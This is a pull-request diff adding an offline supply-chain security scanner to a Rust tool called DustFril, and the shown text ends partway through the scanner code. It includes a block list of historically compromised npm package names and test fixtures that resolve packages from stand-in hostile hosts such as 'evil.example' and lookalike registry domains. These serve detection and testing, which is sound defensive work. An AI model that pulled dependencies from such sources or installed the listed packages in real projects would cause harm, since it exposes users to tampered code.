### PR TITLE
Add offline supply-chain security scanner

### DIFF
--- a/Cargo.lock
+++ b/Cargo.lock
@@ -979,6 +979,7 @@ dependencies = [
  "serde",
  "serde_json",
  "tempfile",
+ "toml 0.9.12+spec-1.1.0",
  "trash",
  "walkdir",
 ]

--- a/Cargo.lock
+++ b/Cargo.lock
@@ -981,6 +981,7 @@ dependencies = [
  "tempfile",
  "toml 0.9.12+spec-1.1.0",
  "trash",
+ "url",
  "walkdir",
 ]
 

--- a/README.ko.md
+++ b/README.ko.md
@@ -19,7 +19,7 @@ DustFril은 개발 산출물을 스캔, 분석, 점검, 정리하기 위한 워�
 - 휴지통 이동 또는 영구 삭제 모드로 정리 실행
 - `preinstall`, `postinstall` 같은 Node 라이프사이클 스크립트 점검
 - 스캔·정리 활동 이력을 버전 형식으로 운영체제 앱 데이터 디렉터리에 저장
-- 규칙 기반 보안 경고로 의심스러운 라이프사이클 명령 탐지
+- Node 및 Rust 프로젝트의 오프라인 공급망 보안 점검
 - 지원 lockfile의 존재 여부와 Git 상태 점검
 - CLI 정리 이력을 운영체제 앱 데이터 디렉터리에 저장
 
@@ -71,9 +71,11 @@ cargo run -p dustfril-cli -- analyze /path/to/workspace --node
 - `audit [path] [--node]`
 - `security scan [path] [--node]`
 
-`security scan`은 Node 라이프사이클 스크립트를 정적으로 검사합니다. 원격
-스크립트 실행, PowerShell 실행, 권한 변경, 다운로드 후 실행 체인을 경고하며
-탐지된 명령을 실행하거나 프로젝트 파일을 변경하지 않습니다.
+`security scan`은 `package.json`, `Cargo.toml`, `package-lock.json`,
+`pnpm-lock.yaml`, `bun.lock`, `Cargo.lock`을 읽기 전용으로 오프라인 점검합니다.
+의심스러운 라이프사이클 스크립트, 공개 레지스트리 외부에서 가져오는 의존성,
+내장된 과거 손상 패키지 목록, 누락되거나 변경된 lockfile을 경고합니다. 탐지된
+명령을 실행하거나 프로젝트 파일을 변경하지 않습니다.
 
 ## 데스크톱 앱
 

--- a/README.md
+++ b/README.md
@@ -19,7 +19,7 @@ The repository is split into a reusable Rust core crate, a CLI app, and a Tauri 
 - Clean artifacts with Trash or permanent deletion mode
 - Audit Node lifecycle scripts such as `preinstall` and `postinstall`
 - Persist versioned local activity history (including legacy cleanup history migration)
-- Detect suspicious lifecycle commands with rule-based security warnings
+- Run an offline supply-chain security scan for Node and Rust projects
 - Check supported lockfile presence and Git status
 - Persist CLI cleanup history to the OS app data directory
 
@@ -76,9 +76,12 @@ Available commands:
 - `audit [path] [--node]`
 - `security scan [path] [--node]`
 
-`security scan` statically checks Node lifecycle scripts for suspicious remote
-script execution, PowerShell execution, permission changes, and download-then-
-execute chains. It never runs the detected commands or modifies project files.
+`security scan` is a read-only, offline check of `package.json`, `Cargo.toml`,
+`package-lock.json`, `pnpm-lock.yaml`, `bun.lock`, and `Cargo.lock`. It reports
+suspicious lifecycle scripts, dependencies sourced outside public registries,
+package names on a built-in list of historically compromised packages, and
+missing or changed lockfiles. It never runs detected commands or modifies
+project files.
 
 ## Desktop App
 

--- a/apps/dustfril-cli/README.md
+++ b/apps/dustfril-cli/README.md
@@ -10,7 +10,7 @@ This package exposes the `dfr` binary and wraps the shared logic from `dustfril-
 - `analyze`: report artifact size, age, and cleanup recommendation
 - `clean`: preview or execute cleanup
 - `audit`: inspect Node lifecycle scripts
-- `security scan`: detect suspicious Node lifecycle commands
+- `security scan`: inspect Node and Rust manifests and lockfiles for supply-chain risks
 
 ## Run
 
@@ -35,5 +35,6 @@ cargo build -p dustfril-cli
 - Supported ecosystem filters: `--rust`, `--node`, `--java`
 - `clean` asks for confirmation before deletion
 - command failures return a non-zero process exit status
+- security scans are read-only and use deterministic offline checks
 - Activity history is stored in the OS app data directory as a versioned `history.json`.
   Existing cleanup-history arrays are migrated when the file is read or appended to.

--- a/apps/dustfril-cli/src/commands/security.rs
+++ b/apps/dustfril-cli/src/commands/security.rs
@@ -21,20 +21,15 @@ pub fn scan(args: &PathArgs) -> bool {
 
     let ecosystems = args.ecosystems();
 
-    let warnings = match api::security_scan(&path, &ecosystems) {
-        Ok(warnings) => warnings,
+    let report = match api::security_scan_report(&path, &ecosystems) {
+        Ok(report) => report,
         Err(error) => {
             eprintln!("Security scan failed: {error}");
             return false;
         }
     };
 
-    if warnings.is_empty() {
-        println!("No suspicious lifecycle scripts detected.");
-        return true;
-    }
-
-    format::print_security_report(&warnings);
+    format::print_security_scan_report(&report);
 
     true
 }

--- a/apps/dustfril-cli/src/format/security_format.rs
+++ b/apps/dustfril-cli/src/format/security_format.rs
@@ -1,16 +1,33 @@
-use dustfril_core::models::SecurityWarning;
+use dustfril_core::models::SecurityReport;
 
-pub fn print_security_report(warnings: &[SecurityWarning]) {
-    println!("Suspicious lifecycle scripts detected\n");
-    println!("Found {} warning(s)\n", warnings.len());
+/// Prints the complete supply-chain security report.
+pub fn print_security_scan_report(report: &SecurityReport) {
+    println!("Supply-chain security scan\n");
+    println!(
+        "Inspected {} manifest(s) and {} lockfile(s)",
+        report.manifests.len(),
+        report.lockfiles.len()
+    );
 
-    for warning in warnings {
+    if report.findings.is_empty() {
+        println!("No security findings detected.");
+        return;
+    }
+
+    println!("Found {} finding(s)\n", report.findings.len());
+
+    for finding in &report.findings {
         println!("----------------------------------------");
-        println!("Package:      {}", warning.package);
-        println!("Script Type:  {}", warning.script_type);
-        println!("Risk Level:   {}", warning.risk_level);
-        println!("Command:      {}", warning.command);
-        println!("Reason:       {}", warning.reason);
+        println!("Category:     {}", finding.kind);
+        println!("Risk Level:   {}", finding.risk_level);
+        println!("Path:         {}", finding.path.display());
+        if let Some(package) = &finding.package {
+            println!("Package:      {package}");
+        }
+        if let Some(evidence) = &finding.evidence {
+            println!("Evidence:     {evidence}");
+        }
+        println!("Reason:       {}", finding.reason);
     }
 
     println!("\n----------------------------------------");

--- a/crates/dustfril-core/Cargo.toml
+++ b/crates/dustfril-core/Cargo.toml
@@ -13,6 +13,7 @@ chrono = { version = "0.4", features = ["serde"] }
 directories = "6"
 git2 = "0.21"
 toml = "0.9.12"
+url = "2.5.8"
 
 [dev-dependencies]
 tempfile = "3.0"

--- a/crates/dustfril-core/Cargo.toml
+++ b/crates/dustfril-core/Cargo.toml
@@ -12,6 +12,7 @@ serde_json = "1"
 chrono = { version = "0.4", features = ["serde"] }
 directories = "6"
 git2 = "0.21"
+toml = "0.9.12"
 
 [dev-dependencies]
 tempfile = "3.0"

--- a/crates/dustfril-core/README.md
+++ b/crates/dustfril-core/README.md
@@ -13,7 +13,8 @@ This crate contains the filesystem scanners, analyzers, cleanup planner and exec
 - `api::audit`: inspect supported lifecycle scripts; malformed manifests are
   returned as errors instead of being silently ignored
 - `api::history`: record and load versioned activity history, including cleanup-history migration
-- `api::security_scan`: detect suspicious lifecycle commands without executing them
+- `api::security_scan`: preserve the lifecycle-only security warnings API
+- `api::security_scan_report`: run the complete offline supply-chain scan
 - `api::check_lockfile_integrity`: check supported lockfile presence and Git status
 - `api::history`: record and load cleanup history using atomic replacement;
   corrupted or unsupported history files are returned as errors
@@ -27,8 +28,11 @@ symbolic links, and never falls back from Trash mode to permanent deletion.
 - Node.js: `node_modules/`
 - Java: `build/`
 - Audit: Node lifecycle scripts for npm, pnpm, yarn, and bun
-- Security rules: remote script pipes, download-and-execute chains, PowerShell execution, and permission changes
+- Security rules: suspicious lifecycle commands, non-registry dependency sources, historically compromised package names, and lockfile issues
 - Lockfile integrity: `package-lock.json`, `pnpm-lock.yaml`, `bun.lock`, and `Cargo.lock`
+
+The supply-chain report reads `package.json` and `Cargo.toml` plus supported
+lockfiles without executing scripts or contacting an external advisory service.
 
 Lockfile checks report `Missing`, `Modified`, `Untracked`, or `Clean`. Git
 worktrees use libgit2 status information equivalent to

--- a/crates/dustfril-core/src/api/audit.rs
+++ b/crates/dustfril-core/src/api/audit.rs
@@ -3,7 +3,8 @@ use std::path::Path;
 use crate::{
     audit_tool,
     error::DustResult,
-    models::{Ecosystem, LifecycleScript, SecurityWarning},
+    models::{Ecosystem, LifecycleScript, SecurityReport, SecurityWarning},
+    security,
 };
 
 /// Audits supported package lifecycle scripts under the given root path.
@@ -24,6 +25,11 @@ pub fn security_scan(root: &Path, ecosystems: &[Ecosystem]) -> DustResult<Vec<Se
     }
 
     audit_tool::security_scan(root)
+}
+
+/// Runs the complete read-only supply-chain security scan.
+pub fn security_scan_report(root: &Path, ecosystems: &[Ecosystem]) -> DustResult<SecurityReport> {
+    security::scan(root, ecosystems)
 }
 
 #[cfg(test)]
@@ -72,5 +78,21 @@ mod tests {
         assert_eq!(result[0].script_type, "postinstall");
         assert_eq!(result[0].risk_level, crate::models::RiskLevel::High);
         assert!(result[0].reason.contains("piped"));
+    }
+
+    #[test]
+    fn security_scan_report_includes_lockfile_findings() {
+        let temp_dir = TempDir::new().unwrap();
+        std::fs::write(
+            temp_dir.path().join("package.json"),
+            r#"{"name":"demo","dependencies":{}}"#,
+        )
+        .unwrap();
+
+        let result = security_scan_report(temp_dir.path(), &[Ecosystem::Node]).unwrap();
+
+        assert!(result.findings.iter().any(|finding| {
+            finding.kind == crate::models::SecurityFindingKind::MissingLockfile
+        }));
     }
 }

--- a/crates/dustfril-core/src/lib.rs
+++ b/crates/dustfril-core/src/lib.rs
@@ -9,3 +9,4 @@ mod fs;
 mod history;
 mod lockfile;
 mod scanner;
+mod security;

--- a/crates/dustfril-core/src/models/audit.rs
+++ b/crates/dustfril-core/src/models/audit.rs
@@ -1,5 +1,7 @@
 use serde::{Deserialize, Serialize};
-use std::fmt;
+use std::{fmt, path::PathBuf};
+
+use super::LockfileCheck;
 
 #[derive(Debug, Clone, Serialize, Deserialize, PartialEq, Eq)]
 pub struct LifecycleScript {
@@ -18,6 +20,83 @@ pub struct SecurityWarning {
     pub command: String,
     pub risk_level: RiskLevel,
     pub reason: String,
+}
+
+/// The type of supply-chain issue reported by the security scanner.
+#[derive(Debug, Clone, Copy, Serialize, Deserialize, PartialEq, Eq, Hash)]
+pub enum SecurityFindingKind {
+    SuspiciousScript,
+    UntrustedDependency,
+    KnownMaliciousPackage,
+    MissingLockfile,
+    ModifiedLockfile,
+    UntrackedLockfile,
+}
+
+impl fmt::Display for SecurityFindingKind {
+    fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
+        let value = match self {
+            Self::SuspiciousScript => "Suspicious script",
+            Self::UntrustedDependency => "Untrusted dependency",
+            Self::KnownMaliciousPackage => "Known malicious package",
+            Self::MissingLockfile => "Missing lockfile",
+            Self::ModifiedLockfile => "Modified lockfile",
+            Self::UntrackedLockfile => "Untracked lockfile",
+        };
+
+        f.write_str(value)
+    }
+}
+
+/// A normalized supply-chain security finding.
+#[derive(Debug, Clone, Serialize, Deserialize, PartialEq, Eq)]
+pub struct SecurityFinding {
+    /// Manifest or lockfile that produced the finding.
+    pub path: PathBuf,
+    /// Broad category of the finding.
+    pub kind: SecurityFindingKind,
+    /// Package name when the finding concerns a dependency.
+    pub package: Option<String>,
+    /// Severity assigned by the offline rule set.
+    pub risk_level: RiskLevel,
+    /// Optional command, dependency source, or lockfile status that supports the finding.
+    pub evidence: Option<String>,
+    /// Human-readable explanation and remediation context.
+    pub reason: String,
+}
+
+impl SecurityFinding {
+    /// Creates a normalized security finding.
+    pub fn new(
+        path: PathBuf,
+        kind: SecurityFindingKind,
+        package: Option<String>,
+        risk_level: RiskLevel,
+        evidence: Option<String>,
+        reason: impl Into<String>,
+    ) -> Self {
+        Self {
+            path,
+            kind,
+            package,
+            risk_level,
+            evidence,
+            reason: reason.into(),
+        }
+    }
+}
+
+/// Complete result of a read-only supply-chain security scan.
+#[derive(Debug, Clone, Serialize, Deserialize, PartialEq, Eq, Default)]
+pub struct SecurityReport {
+    /// All findings, including lifecycle warnings and lockfile issues.
+    pub findings: Vec<SecurityFinding>,
+    /// Lifecycle warnings retained for callers using the original audit model.
+    pub lifecycle_warnings: Vec<SecurityWarning>,
+    /// Lockfiles inspected while building the report.
+    pub lockfiles: Vec<LockfileCheck>,
+    /// Manifests successfully inspected by the report.
+    pub manifests: Vec<PathBuf>,
 }
 
 #[derive(Debug, Clone, Copy, Serialize, Deserialize, PartialEq, Eq)]

--- a/crates/dustfril-core/src/security.rs
+++ b/crates/dustfril-core/src/security.rs
@@ -7,11 +7,11 @@
 use std::{fs, path::Path};
 
 use serde_json::Value;
+use url::Url;
 
 use crate::{
     audit_tool,
     error::{DustError, DustResult},
-    fs::walk_dirs,
     lockfile,
     models::{
         Ecosystem, LockfileCheck, LockfileKind, LockfileStatus, RiskLevel, SecurityFinding,
@@ -43,14 +43,14 @@ const KNOWN_COMPROMISED_PACKAGES: &[&str] = &[
 
 /// Runs the complete offline security scan for the selected ecosystems.
 pub fn scan(root: &Path, ecosystems: &[Ecosystem]) -> DustResult<SecurityReport> {
-    walk_dirs(root)?;
-
     let scan_node = ecosystems.is_empty() || ecosystems.contains(&Ecosystem::Node);
     let scan_rust = ecosystems.is_empty() || ecosystems.contains(&Ecosystem::Rust);
 
     if !scan_node && !scan_rust {
         return Ok(SecurityReport::default());
     }
+
+    validate_root(root)?;
 
     let mut report = SecurityReport::default();
 
@@ -118,6 +118,19 @@ fn check_relevant_lockfiles(
     };
 
     lockfile::check_lockfiles(root, &expected)
+}
+
+fn validate_root(root: &Path) -> DustResult<()> {
+    match fs::symlink_metadata(root) {
+        Ok(metadata) if metadata.file_type().is_symlink() || !metadata.is_dir() => {
+            Err(DustError::InvalidPath(root.to_path_buf()))
+        }
+        Ok(_) => Ok(()),
+        Err(error) if error.kind() == std::io::ErrorKind::NotFound => {
+            Err(DustError::InvalidPath(root.to_path_buf()))
+        }
+        Err(error) => Err(DustError::Io(error)),
+    }
 }
 
 fn scan_package_manifest(path: &Path, report: &mut SecurityReport) -> DustResult<()> {
@@ -430,11 +443,7 @@ fn scan_pnpm_lock(path: &Path, report: &mut SecurityReport) -> DustResult<()> {
 
 fn scan_bun_lock(path: &Path, report: &mut SecurityReport) -> DustResult<()> {
     let content = fs::read_to_string(path)?;
-    let Ok(lockfile) = serde_json::from_str::<Value>(&content) else {
-        // Bun has used more than one lockfile representation. A non-JSON
-        // lockfile is still checked for presence and Git status above.
-        return Ok(());
-    };
+    let lockfile = parse_jsonc(&content).map_err(|error| manifest_error(path, error))?;
 
     if let Some(packages) = lockfile.get("packages") {
         inspect_bun_value(path, packages, None, report);
@@ -444,6 +453,129 @@ fn scan_bun_lock(path: &Path, report: &mut SecurityReport) -> DustResult<()> {
     }
 
     Ok(())
+}
+
+fn parse_jsonc(content: &str) -> Result<Value, String> {
+    let without_comments = strip_jsonc_comments(content)?;
+    let normalized = remove_jsonc_trailing_commas(&without_comments);
+
+    serde_json::from_str(&normalized).map_err(|error| error.to_string())
+}
+
+fn strip_jsonc_comments(content: &str) -> Result<String, String> {
+    let characters: Vec<char> = content.chars().collect();
+    let mut result = String::with_capacity(content.len());
+    let mut index = 0;
+    let mut in_string = false;
+    let mut escaped = false;
+
+    while index < characters.len() {
+        let character = characters[index];
+
+        if in_string {
+            result.push(character);
+            if escaped {
+                escaped = false;
+            } else if character == '\\' {
+                escaped = true;
+            } else if character == '"' {
+                in_string = false;
+            }
+            index += 1;
+            continue;
+        }
+
+        if character == '"' {
+            in_string = true;
+            result.push(character);
+            index += 1;
+            continue;
+        }
+
+        if character == '/' && characters.get(index + 1) == Some(&'/') {
+            index += 2;
+            while index < characters.len() && characters[index] != '\n' {
+                index += 1;
+            }
+            continue;
+        }
+
+        if character == '/' && characters.get(index + 1) == Some(&'*') {
+            index += 2;
+            let mut closed = false;
+            while index < characters.len() {
+                if characters[index] == '*' && characters.get(index + 1) == Some(&'/') {
+                    index += 2;
+                    closed = true;
+                    break;
+                }
+                if characters[index] == '\n' {
+                    result.push('\n');
+                }
+                index += 1;
+            }
+            if !closed {
+                return Err("unterminated JSONC block comment".to_owned());
+            }
+            continue;
+        }
+
+        result.push(character);
+        index += 1;
+    }
+
+    Ok(result)
+}
+
+fn remove_jsonc_trailing_commas(content: &str) -> String {
+    let characters: Vec<char> = content.chars().collect();
+    let mut result = String::with_capacity(content.len());
+    let mut index = 0;
+    let mut in_string = false;
+    let mut escaped = false;
+
+    while index < characters.len() {
+        let character = characters[index];
+
+        if in_string {
+            result.push(character);
+            if escaped {
+                escaped = false;
+            } else if character == '\\' {
+                escaped = true;
+            } else if character == '"' {
+                in_string = false;
+            }
+            index += 1;
+            continue;
+        }
+
+        if character == '"' {
+            in_string = true;
+            result.push(character);
+            index += 1;
+            continue;
+        }
+
+        if character == ',' {
+            let mut next = index + 1;
+            while characters
+                .get(next)
+                .is_some_and(|value| value.is_whitespace())
+            {
+                next += 1;
+            }
+            if matches!(characters.get(next), Some(']' | '}')) {
+                index += 1;
+                continue;
+            }
+        }
+
+        result.push(character);
+        index += 1;
+    }
+
+    result
 }
 
 fn inspect_bun_value(path: &Path, value: &Value, hint: Option<&str>, report: &mut SecurityReport) {
@@ -637,17 +769,40 @@ fn is_known_compromised_package(name: &str) -> bool {
 }
 
 fn is_trusted_node_registry(source: &str) -> bool {
-    let source = source.trim().to_ascii_lowercase();
-    source.starts_with("https://registry.npmjs.org/")
-        || source.starts_with("https://registry.yarnpkg.com/")
-        || source.starts_with("https://registry.npmjs.org")
-        || source.starts_with("https://registry.yarnpkg.com")
+    let Ok(url) = Url::parse(source.trim()) else {
+        return false;
+    };
+
+    url.scheme() == "https"
+        && url.port().is_none()
+        && matches!(
+            url.host_str(),
+            Some("registry.npmjs.org" | "registry.yarnpkg.com")
+        )
 }
 
 fn is_trusted_cargo_registry(source: &str) -> bool {
-    let source = source.to_ascii_lowercase();
-    source.starts_with("registry+") && source.contains("crates.io")
-        || source.starts_with("sparse+") && source.contains("crates.io")
+    let Some((kind, raw_url)) = source.split_once('+') else {
+        return false;
+    };
+    let Ok(url) = Url::parse(raw_url) else {
+        return false;
+    };
+
+    if url.scheme() != "https" || url.port().is_some() || url.query().is_some() {
+        return false;
+    }
+
+    match kind {
+        "registry" => {
+            url.host_str() == Some("github.com")
+                && url.path().trim_end_matches('/') == "/rust-lang/crates.io-index"
+        }
+        "sparse" => {
+            url.host_str() == Some("index.crates.io") && url.path().trim_matches('/').is_empty()
+        }
+        _ => false,
+    }
 }
 
 fn package_name_from_selector(selector: &str) -> Option<&str> {
@@ -814,13 +969,28 @@ mod tests {
         .unwrap();
         fs::write(
             bun_dir.path().join("bun.lock"),
-            r#"{"lockfileVersion":1,"packages":{"event-stream":["event-stream@3.3.6",{"integrity":"sha512-example"}]}}"#,
+            r#"{
+                // Bun writes JSONC, including comments and trailing commas.
+                "lockfileVersion": 1,
+                "packages": {
+                    "event-stream": [
+                        "event-stream@3.3.6",
+                        {
+                            "resolved": "https://evil.example/event-stream.tgz",
+                        },
+                    ],
+                },
+            }"#,
         )
         .unwrap();
 
         let bun_report = scan(bun_dir.path(), &[Ecosystem::Node]).unwrap();
         assert!(bun_report.findings.iter().any(|finding| {
             finding.kind == SecurityFindingKind::KnownMaliciousPackage
+                && finding.package.as_deref() == Some("event-stream")
+        }));
+        assert!(bun_report.findings.iter().any(|finding| {
+            finding.kind == SecurityFindingKind::UntrustedDependency
                 && finding.package.as_deref() == Some("event-stream")
         }));
     }
@@ -862,6 +1032,44 @@ mod tests {
         assert_eq!(
             package_name_from_selector("/event-stream@3.3.6"),
             Some("event-stream")
+        );
+    }
+
+    #[test]
+    fn registry_checks_reject_lookalike_hosts_and_accept_canonical_sources() {
+        assert!(is_trusted_node_registry(
+            "https://registry.npmjs.org/package/-/package-1.0.0.tgz"
+        ));
+        assert!(!is_trusted_node_registry(
+            "https://registry.npmjs.org.evil.example/package.tgz"
+        ));
+        assert!(!is_trusted_node_registry(
+            "https://registry.yarnpkg.com.evil.example/package.tgz"
+        ));
+
+        assert!(is_trusted_cargo_registry(
+            "registry+https://github.com/rust-lang/crates.io-index"
+        ));
+        assert!(is_trusted_cargo_registry("sparse+https://index.crates.io/"));
+        assert!(!is_trusted_cargo_registry(
+            "registry+https://evil.example/crates.io/index"
+        ));
+    }
+
+    #[test]
+    fn bun_jsonc_parse_errors_are_reported() {
+        let temp_dir = TempDir::new().unwrap();
+        fs::write(
+            temp_dir.path().join("package.json"),
+            r#"{"name":"demo","packageManager":"bun@1.0.0"}"#,
+        )
+        .unwrap();
+        fs::write(temp_dir.path().join("bun.lock"), "{ /* unterminated").unwrap();
+
+        let result = scan(temp_dir.path(), &[Ecosystem::Node]);
+
+        assert!(
+            matches!(result, Err(DustError::Manifest(message)) if message.contains("bun.lock"))
         );
     }
 }

--- a/crates/dustfril-core/src/security.rs
+++ b/crates/dustfril-core/src/security.rs
@@ -1,0 +1,867 @@
+//! Read-only supply-chain checks for project manifests and lockfiles.
+//!
+//! The scanner deliberately works offline. Dependency source checks and the
+//! compromised-package list are conservative signals for review; they are not
+//! a replacement for an advisories database or a package manager audit.
+
+use std::{fs, path::Path};
+
+use serde_json::Value;
+
+use crate::{
+    audit_tool,
+    error::{DustError, DustResult},
+    fs::walk_dirs,
+    lockfile,
+    models::{
+        Ecosystem, LockfileCheck, LockfileKind, LockfileStatus, RiskLevel, SecurityFinding,
+        SecurityFindingKind, SecurityReport,
+    },
+};
+
+const NODE_DEPENDENCY_SECTIONS: &[&str] = &[
+    "dependencies",
+    "devDependencies",
+    "optionalDependencies",
+    "peerDependencies",
+];
+
+const KNOWN_COMPROMISED_PACKAGES: &[&str] = &[
+    // Historical npm compromise and protestware incidents. The package name
+    // is intentionally enough to produce a review finding because a lockfile
+    // may not expose an affected version in every supported format.
+    "babelcli",
+    "coa",
+    "crossenv",
+    "eslint-scope",
+    "event-stream",
+    "flatmap-stream",
+    "node-ipc",
+    "rc",
+    "ua-parser-js",
+];
+
+/// Runs the complete offline security scan for the selected ecosystems.
+pub fn scan(root: &Path, ecosystems: &[Ecosystem]) -> DustResult<SecurityReport> {
+    walk_dirs(root)?;
+
+    let scan_node = ecosystems.is_empty() || ecosystems.contains(&Ecosystem::Node);
+    let scan_rust = ecosystems.is_empty() || ecosystems.contains(&Ecosystem::Rust);
+
+    if !scan_node && !scan_rust {
+        return Ok(SecurityReport::default());
+    }
+
+    let mut report = SecurityReport::default();
+
+    if scan_node {
+        report.lifecycle_warnings = audit_tool::security_scan(root)?;
+
+        for warning in &report.lifecycle_warnings {
+            report.findings.push(SecurityFinding::new(
+                root.join("package.json"),
+                SecurityFindingKind::SuspiciousScript,
+                Some(warning.package.clone()),
+                warning.risk_level,
+                Some(warning.command.clone()),
+                format!(
+                    "{} Lifecycle hook: {}.",
+                    warning.reason, warning.script_type
+                ),
+            ));
+        }
+
+        let package_json = root.join("package.json");
+        if package_json.is_file() {
+            scan_package_manifest(&package_json, &mut report)?;
+        }
+    }
+
+    if scan_rust {
+        let cargo_toml = root.join("Cargo.toml");
+        if cargo_toml.is_file() {
+            scan_cargo_manifest(&cargo_toml, &mut report)?;
+        }
+    }
+
+    let mut lockfiles = check_relevant_lockfiles(root, scan_node, scan_rust)?;
+    lockfiles.retain(|check| {
+        (scan_node && check.kind.ecosystem() == Ecosystem::Node)
+            || (scan_rust && check.kind.ecosystem() == Ecosystem::Rust)
+    });
+
+    for check in &lockfiles {
+        report_lockfile_status(check, &mut report);
+
+        if check.status != LockfileStatus::Missing {
+            scan_lockfile(check, &mut report)?;
+        }
+    }
+
+    report.lockfiles = lockfiles;
+    Ok(report)
+}
+
+fn check_relevant_lockfiles(
+    root: &Path,
+    scan_node: bool,
+    scan_rust: bool,
+) -> DustResult<Vec<LockfileCheck>> {
+    if scan_node && root.join("package.json").is_file() {
+        return lockfile::check_lockfile_integrity(root);
+    }
+
+    let expected = if scan_rust && root.join("Cargo.toml").is_file() {
+        vec![LockfileKind::CargoLock]
+    } else {
+        Vec::new()
+    };
+
+    lockfile::check_lockfiles(root, &expected)
+}
+
+fn scan_package_manifest(path: &Path, report: &mut SecurityReport) -> DustResult<()> {
+    let content = fs::read_to_string(path)?;
+    let manifest: Value =
+        serde_json::from_str(&content).map_err(|error| manifest_error(path, error.to_string()))?;
+
+    report.manifests.push(path.to_path_buf());
+
+    for section in NODE_DEPENDENCY_SECTIONS {
+        let Some(dependencies) = manifest.get(*section).and_then(Value::as_object) else {
+            continue;
+        };
+
+        for (name, specification) in dependencies {
+            inspect_node_dependency(path, name, specification.as_str(), report);
+        }
+    }
+
+    if let Some(bundled) = manifest
+        .get("bundledDependencies")
+        .and_then(Value::as_array)
+    {
+        for name in bundled.iter().filter_map(Value::as_str) {
+            report_known_package(path, name, report);
+        }
+    }
+
+    Ok(())
+}
+
+fn inspect_node_dependency(
+    path: &Path,
+    name: &str,
+    specification: Option<&str>,
+    report: &mut SecurityReport,
+) {
+    report_known_package(path, name, report);
+
+    let Some(specification) = specification else {
+        return;
+    };
+
+    if let Some(source) = untrusted_node_source(specification) {
+        report.finding(
+            path,
+            SecurityFindingKind::UntrustedDependency,
+            Some(name.to_owned()),
+            RiskLevel::Medium,
+            Some(specification.to_owned()),
+            format!(
+                "Dependency uses a non-registry source ({source}); review and pin the source before installation."
+            ),
+        );
+    }
+}
+
+fn scan_cargo_manifest(path: &Path, report: &mut SecurityReport) -> DustResult<()> {
+    let content = fs::read_to_string(path)?;
+    let manifest: toml::Value =
+        toml::from_str(&content).map_err(|error| manifest_error(path, error.to_string()))?;
+
+    report.manifests.push(path.to_path_buf());
+    inspect_cargo_tables(path, &manifest, report);
+    Ok(())
+}
+
+fn inspect_cargo_tables(path: &Path, value: &toml::Value, report: &mut SecurityReport) {
+    let Some(table) = value.as_table() else {
+        return;
+    };
+
+    for (key, value) in table {
+        if is_cargo_dependency_section(key)
+            && let Some(dependencies) = value.as_table()
+        {
+            for (name, specification) in dependencies {
+                inspect_cargo_dependency(path, name, specification, report);
+            }
+        }
+
+        inspect_cargo_tables(path, value, report);
+    }
+}
+
+fn inspect_cargo_dependency(
+    path: &Path,
+    name: &str,
+    specification: &toml::Value,
+    report: &mut SecurityReport,
+) {
+    let package_name = specification
+        .get("package")
+        .and_then(toml::Value::as_str)
+        .unwrap_or(name);
+    report_known_package(path, package_name, report);
+
+    let Some((source, detail)) = untrusted_cargo_source(specification) else {
+        return;
+    };
+
+    report.finding(
+        path,
+        SecurityFindingKind::UntrustedDependency,
+        Some(package_name.to_owned()),
+        RiskLevel::Medium,
+        Some(detail.to_owned()),
+        format!(
+            "Cargo dependency uses a non-crates.io source ({source}); review the source and pin the revision."
+        ),
+    );
+}
+
+fn report_known_package(path: &Path, name: &str, report: &mut SecurityReport) {
+    if !is_known_compromised_package(name) {
+        return;
+    }
+
+    report.finding(
+        path,
+        SecurityFindingKind::KnownMaliciousPackage,
+        Some(name.to_owned()),
+        RiskLevel::Critical,
+        None,
+        "Package name matches DustFril's built-in list of historically compromised packages; verify the exact version and replace it if affected.",
+    );
+}
+
+fn report_lockfile_status(check: &LockfileCheck, report: &mut SecurityReport) {
+    let (kind, risk_level, reason) = match check.status {
+        LockfileStatus::Missing => (
+            SecurityFindingKind::MissingLockfile,
+            RiskLevel::High,
+            "Expected lockfile is missing; dependency resolution is not reproducible.",
+        ),
+        LockfileStatus::Modified => (
+            SecurityFindingKind::ModifiedLockfile,
+            RiskLevel::High,
+            "Lockfile differs from the committed Git state; review the dependency changes before installation.",
+        ),
+        LockfileStatus::Untracked => (
+            SecurityFindingKind::UntrackedLockfile,
+            RiskLevel::Medium,
+            "Lockfile is not tracked by Git; dependency resolution can change without review.",
+        ),
+        LockfileStatus::Clean => return,
+    };
+
+    report.finding(
+        &check.path,
+        kind,
+        None,
+        risk_level,
+        Some(check.status.to_string()),
+        format!("{} ({})", reason, check.kind),
+    );
+}
+
+fn scan_lockfile(check: &LockfileCheck, report: &mut SecurityReport) -> DustResult<()> {
+    match check.kind {
+        LockfileKind::PackageLockJson => scan_package_lock(&check.path, report),
+        LockfileKind::PnpmLockYaml => scan_pnpm_lock(&check.path, report),
+        LockfileKind::BunLock => scan_bun_lock(&check.path, report),
+        LockfileKind::CargoLock => scan_cargo_lock(&check.path, report),
+    }
+}
+
+fn scan_package_lock(path: &Path, report: &mut SecurityReport) -> DustResult<()> {
+    let content = fs::read_to_string(path)?;
+    let lockfile: Value =
+        serde_json::from_str(&content).map_err(|error| manifest_error(path, error.to_string()))?;
+
+    if let Some(packages) = lockfile.get("packages").and_then(Value::as_object) {
+        for (key, package) in packages {
+            let Some(package) = package.as_object() else {
+                continue;
+            };
+            let name = package
+                .get("name")
+                .and_then(Value::as_str)
+                .or_else(|| package_name_from_selector(key));
+            let Some(name) = name else { continue };
+            if key.is_empty() && package.get("version").is_none() {
+                continue;
+            }
+
+            let source = package
+                .get("resolved")
+                .or_else(|| package.get("resolvedUrl"))
+                .and_then(Value::as_str);
+            inspect_node_lock_dependency(path, name, source, report);
+        }
+    }
+
+    if let Some(dependencies) = lockfile.get("dependencies").and_then(Value::as_object) {
+        inspect_npm_dependency_tree(path, dependencies, report);
+    }
+
+    Ok(())
+}
+
+fn inspect_npm_dependency_tree(
+    path: &Path,
+    dependencies: &serde_json::Map<String, Value>,
+    report: &mut SecurityReport,
+) {
+    for (name, dependency) in dependencies {
+        let source = dependency
+            .get("resolved")
+            .or_else(|| dependency.get("resolvedUrl"))
+            .and_then(Value::as_str);
+        inspect_node_lock_dependency(path, name, source, report);
+
+        if let Some(nested) = dependency.get("dependencies").and_then(Value::as_object) {
+            inspect_npm_dependency_tree(path, nested, report);
+        }
+    }
+}
+
+fn inspect_node_lock_dependency(
+    path: &Path,
+    name: &str,
+    source: Option<&str>,
+    report: &mut SecurityReport,
+) {
+    report_known_package(path, name, report);
+
+    let Some(source) = source else { return };
+    if !is_trusted_node_registry(source) {
+        report.finding(
+            path,
+            SecurityFindingKind::UntrustedDependency,
